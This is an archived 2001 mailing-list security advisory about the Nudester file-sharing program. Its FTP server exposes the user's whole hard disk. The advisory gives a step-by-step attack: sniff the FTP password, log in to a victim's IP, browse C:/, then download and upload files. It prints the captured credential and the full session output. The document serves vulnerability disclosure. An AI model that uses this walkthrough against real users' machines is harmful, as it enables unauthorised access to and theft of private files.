OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Gary (Cyph3rphreaker.net)
Date: Thu Aug 16 2001 - 22:10:22 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    <------------------------->
    [Real Security Advisory #1]
    [ Author: Cyph3r ]
    [ www.Real-Security.org ]
    [ Date: 08/16/2001 ]
    <------------------------->
    [Vulnerable: ]
    [Nudester 1.10(and below?)]
    [ OS: Win9x/me/2k/nt/xp ]
    [ Site: www.nudester.org ]
    <------------------------->

    -> Severity: Malicious users can gain full access to the users Files
    (upload/download)

    -> Overview: Nudester, a file sharing program for porn uses the FTP protocol
    to transfer files,
    The problem is it gives access to the whole hard disk instead of just the
    folder containing porn.
    Example:
    Open Nudester, and a sniffer program IE: Iris(www.eeye.com) and download a
    file from a user on Nudester
    While having the sniffer running filtering port 21 inclusive so you can get
    the password.

    <Sniffed Data>

    220 ICS FTP Server ready
    user NUDESTER
    331 Password required for NUDESTER
    pass NSASTdfg!"#.%&sd3214894231SDFGSD598502534
    230 User NUDESTER logged in

    </Sniffed data>

    Open an ftp client and connect to the ip

    ftp> open ***.***.***.***
    Connected to ***.***.***.***
    220 ICS FTP Server ready.
    User (***.***.***.***:(none)): NUDESTER
    331 Password required for NUDESTER.
    Password: NSASTdfg!"#.%&sd3214894231SDFGSD598502534
    230 User NUDESTER logged in.

    - Bingo!

    ftp> dir
    200 Port command successful.
    150 Opening data connection for directory list.
    C:\TEMP\*.* not found
    226 File sent ok
    ftp: 23 bytes received in 0.04Seconds 0.57Kbytes/sec.
    ftp> cd ..
    250 CWD command successful. "C:/" is current directory.
    ftp> DIR
    200 Port command successful.
    150 Opening data connection for directory list.
    -rw-rw-rw- 1 ftp ftp 1152 Oct 30 2000 FRUNLOG.TXT
    -rwxrwxrwx 1 ftp ftp 25473 May 15 1998 MSCDEX.EXE
    -rw-rw-rw- 1 ftp ftp 10604 May 15 1997 CDROM.SYS
    -rwxrwxrwx 1 ftp ftp 20135 May 15 1998 KEYB.COM
    -rw-rw-rw- 1 ftp ftp 34566 May 15 1998 KEYBOARD.SYS
    -rwxrwxrwx 1 ftp ftp 71102 May 15 1998 EDIT.COM
    -rw-rw-rw- 1 ftp ftp 38 Oct 16 1998 AUTOEXEC.OLD
    -rw-rw-rw- 1 ftp ftp 31 Oct 16 1998 CONFIG.OLD
    drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 ATI
    -rw-rw-rw- 1 ftp ftp 121 Oct 29 2000 CONFIG.DOS
    -rw-rw-rw- 1 ftp ftp 113 Oct 29 2000 AUTOEXEC.DOS
    -rw-rw-rw- 1 ftp ftp 436 Nov 18 2000 AUTOEXEC.BAK
    drw-rw-rw- 1 ftp ftp 0 Oct 29 2000 WINDOWS
    drw-rw-rw- 1 ftp ftp 0 Oct 30 2000 WINDOWS.000
    -rw-rw-rw- 1 ftp ftp 7471 Nov 18 2000 NETLOG.TXT
    -rw-rw-rw- 1 ftp ftp 172 Nov 15 2000 CONFIG.BAK
    -rw-rw-rw- 1 ftp ftp 5048 Nov 17 2000 SETUPXLG.TXT
    -rwxrwxrwx 1 ftp ftp 438 Aug 16 00:43 AUTOEXEC.BAT
    dr--r--r-- 1 ftp ftp 0 Oct 29 2000 Program Files
    -rw-rw-rw- 1 ftp ftp 172 Nov 18 2000 CONFIG.SYS
    -rw-rw-rw- 1 ftp ftp 19622 Aug 10 18:50 SCANDISK.LOG
    -rw-rw-rw- 1 ftp ftp 327 Oct 30 2030 outreg.txt
    -rw-rw-rw- 1 ftp ftp 339 Oct 30 2030 outreg.ini
    drw-rw-rw- 1 ftp ftp 0 Oct 30 2030 dcpt
    -rwxrwxrwx 1 ftp ftp 17129 Oct 30 2030 BOOTDISK.EXE
    -rwxrwxrwx 1 ftp ftp 2884286 Oct 30 2030 DECOMP.EXE
    -rwxrwxrwx 1 ftp ftp 265420 Oct 30 2030 DOS4GW.EXE
    -rw-rw-rw- 1 ftp ftp 507 Oct 30 2030 FILE_ID.DIZ
    -rw-rw-rw- 1 ftp ftp 2086 Oct 30 2030 HELPME.DOC
    -rw-rw-rw- 1 ftp ftp 3639 Oct 30 2030 LICENSE.DOC
    -rw-rw-rw- 1 ftp ftp 1377 Oct 30 2030 ORDER.DOC
    drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 KPCMS
    -rw-rw-rw- 1 ftp ftp 386 Nov 02 2000 AUTOEXEC.001
    drw-rw-rw- 1 ftp ftp 0 Nov 02 2000 psfonts
    -rw-rw-rw- 1 ftp ftp 25 Nov 03 2000 prompt
    -rwxrwxrwx 1 ftp ftp 95874 May 05 1999 COMMAND.COM
    drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Winzip
    drw-rw-rw- 1 ftp ftp 0 Dec 10 2000 unzipped
    drw-rw-rw- 1 ftp ftp 0 Nov 19 2000 Antivirus
    drw-rw-rw- 1 ftp ftp 0 Dec 16 2000 My Music
    -rw-rw-rw- 1 ftp ftp 118 Jan 20 00:27 netsig.txt
    drw-rw-rw- 1 ftp ftp 0 Mar 15 21:05 accelerator
    -rw-rw-rw- 1 ftp ftp 22721 Aug 17 01:00 winzip.log
    226 File sent ok
    ftp: 4652 bytes received in 5.64Seconds 0.83Kbytes/sec.

    - Lets see if we have access to download a file

    ftp> get netsig.txt
    200 Port command successful.
    150 Opening data connection for netsig.txt.
    226 File sent ok
    ftp: 118 bytes received in 0.00Seconds 118000.00Kbytes/sec.

    - Yep, let's try to upload a file

    ftp> put c:\temp.txt
    200 Port command successful.
    150 Opening data connection for TEMP.TXT.
    226 File received ok

    -> Conclusion: anyone can gain full access to Nudester user's files; the
    username is the same for every user
    However the password is not the same, you will have to sniff while
    downloading a file to retrieve the password,
    The only solution to this problem is not to use Nudester.

    -> Credits: Cyph3r - Cyph3rphreaker.net

    -> Greets: Pseudo, lice_, Electro, Deleted, Venomous, c0redump, acid,
    spasms, trew, zeronine, matt, shizniz, z0mb1e
    b0b, neonfreon, dragnet, c0de, spiked and anyone else i missed.